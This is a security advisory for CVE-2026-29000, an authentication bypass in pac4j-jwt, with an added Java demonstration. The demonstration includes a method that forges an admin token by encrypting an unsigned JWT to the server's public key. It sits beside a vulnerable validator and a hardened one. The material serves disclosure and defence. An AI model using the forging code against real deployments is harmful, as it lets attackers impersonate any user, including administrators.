PT-2026-23074 · Pac4J-Jwt
Amartya Jha · Published 2026-03-04 · Updated 2026-05-27

| CVE | CVE-2026-29000 |
| CVSS v3.1 | 10 (Critical) |
| Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L |
Name of the Vulnerable Software and Affected Versions
pac4j-jwt versions prior to 4.5.9
pac4j-jwt versions prior to 5.7.9
pac4j-jwt versions prior to 6.3.3
Description
An authentication bypass exists in the JwtAuthenticator component when it processes encrypted JSON Web Tokens (JWE). A remote attacker who holds the server's RSA public key, the public half of the key pair the server uses to decrypt tokens and therefore not a secret, can forge an authentication token by wrapping a PlainJWT (an unsigned JWT, alg "none") containing arbitrary subject and role claims inside a JWE encrypted to that key. The library decrypts the outer JWE and accepts the inner unsigned token as if it had been verified, so no signature check is ever performed and the attacker can impersonate any user, including administrators. The attack path described here presupposes a deployment in which JwtAuthenticator is configured to decrypt incoming tokens with an RSA encryption configuration.
Recommendations
Update pac4j-jwt to version 4.5.9 or later.
Update pac4j-jwt to version 5.7.9 or later.
Update pac4j-jwt to version 6.3.3 or later.
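To make the token shape in the description concrete, the following Java example is added here; it is not code from pac4j or from this advisory. It uses the Nimbus JOSE+JWT library, on which pac4j-jwt is built, to (1) play the attacker, who encrypts an unsigned PlainJWT with only the server's RSA public key, (2) model the vulnerable acceptance pattern, where whatever JWT parses out of the decrypted payload is trusted, and (3) show one hardened pattern that requires the inner token to be a JWS with an allow-listed algorithm and a valid signature. The method names, the in-memory key pairs and the vulnerable/hardened validators are illustrative assumptions; they are not pac4j's JwtAuthenticator code and the project's actual fix may be structured differently.

```java
import com.nimbusds.jose.*;
import com.nimbusds.jose.crypto.RSADecrypter;
import com.nimbusds.jose.crypto.RSAEncrypter;
import com.nimbusds.jose.crypto.RSASSAVerifier;
import com.nimbusds.jwt.*;

import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.interfaces.RSAPrivateKey;
import java.security.interfaces.RSAPublicKey;
import java.text.ParseException;
import java.util.Date;
import java.util.List;

// Illustrative model of the JWE-wrapped PlainJWT issue; not pac4j's implementation.
public class NestedJwtDemo {

    // Attacker side: needs only the server's RSA *public* encryption key.
    static String forgeEncryptedPlainJwt(RSAPublicKey serverEncPublicKey) throws JOSEException {
        JWTClaimsSet claims = new JWTClaimsSet.Builder()
                .subject("admin")                               // arbitrary subject
                .claim("roles", List.of("ROLE_ADMIN"))          // arbitrary roles
                .expirationTime(new Date(System.currentTimeMillis() + 3_600_000L))
                .build();
        PlainJWT plain = new PlainJWT(claims);                 // alg=none, no signature at all

        JWEHeader header = new JWEHeader.Builder(JWEAlgorithm.RSA_OAEP_256, EncryptionMethod.A256GCM)
                .contentType("JWT")                             // cty=JWT flags a nested token
                .build();
        JWEObject jwe = new JWEObject(header, new Payload(plain.serialize()));
        jwe.encrypt(new RSAEncrypter(serverEncPublicKey));
        return jwe.serialize();                                 // 5-part compact JWE
    }

    // Vulnerable pattern (hypothetical): decrypt, then trust whatever JWT the payload parses to.
    static JWTClaimsSet vulnerableValidate(String token, RSAPrivateKey decKey)
            throws ParseException, JOSEException {
        JWEObject jwe = JWEObject.parse(token);
        jwe.decrypt(new RSADecrypter(decKey));
        JWT inner = JWTParser.parse(jwe.getPayload().toString());
        // A PlainJWT parses fine and yields claims; no signature check ever runs.
        return inner.getJWTClaimsSet();
    }

    // Hardened pattern (hypothetical): inner token must be a JWS, alg must be allow-listed,
    // and the signature must verify against the server's *signing* public key.
    static JWTClaimsSet hardenedValidate(String token, RSAPrivateKey decKey, RSAPublicKey sigKey)
            throws ParseException, JOSEException {
        JWEObject jwe = JWEObject.parse(token);
        jwe.decrypt(new RSADecrypter(decKey));
        JWT inner = JWTParser.parse(jwe.getPayload().toString());
        if (!(inner instanceof SignedJWT)) {
            throw new JOSEException("inner token is not a JWS: " + inner.getClass().getSimpleName());
        }
        SignedJWT signed = (SignedJWT) inner;
        if (!JWSAlgorithm.RS256.equals(signed.getHeader().getAlgorithm())) {
            throw new JOSEException("unexpected alg " + signed.getHeader().getAlgorithm());
        }
        if (!signed.verify(new RSASSAVerifier(sigKey))) {
            throw new JOSEException("signature verification failed");
        }
        return signed.getJWTClaimsSet();
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator gen = KeyPairGenerator.getInstance("RSA");
        gen.initialize(2048);
        KeyPair encKeys = gen.generateKeyPair();   // server's encryption pair; public half is public
        KeyPair sigKeys = gen.generateKeyPair();   // server's signing pair; attacker never sees the private half

        String forged = forgeEncryptedPlainJwt((RSAPublicKey) encKeys.getPublic());

        JWTClaimsSet accepted = vulnerableValidate(forged, (RSAPrivateKey) encKeys.getPrivate());
        System.out.println("vulnerable path accepted subject=" + accepted.getSubject()
                + " roles=" + accepted.getClaim("roles"));

        try {
            hardenedValidate(forged, (RSAPrivateKey) encKeys.getPrivate(), (RSAPublicKey) sigKeys.getPublic());
            System.out.println("hardened path accepted the forged token (should not happen)");
        } catch (JOSEException e) {
            System.out.println("hardened path rejected: " + e.getMessage());
        }
    }
}
```

The point the hardened validator makes is the one the weakness name captures: decrypting a JWE proves only that the sender had the public key, which anyone may have, so confidentiality of the wrapper says nothing about who minted the claims. Authenticity must come from a signature on the inner token, checked against an explicitly allow-listed algorithm; any code path that yields claims from a PlainJWT, whether bare or nested, is an authentication bypass.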
Weakness Enumeration
Improper Verification of Cryptographic Signature (CWE-347)
Related Identifiers
CVE-2026-29000
Affected Products
Pac4J-Jwt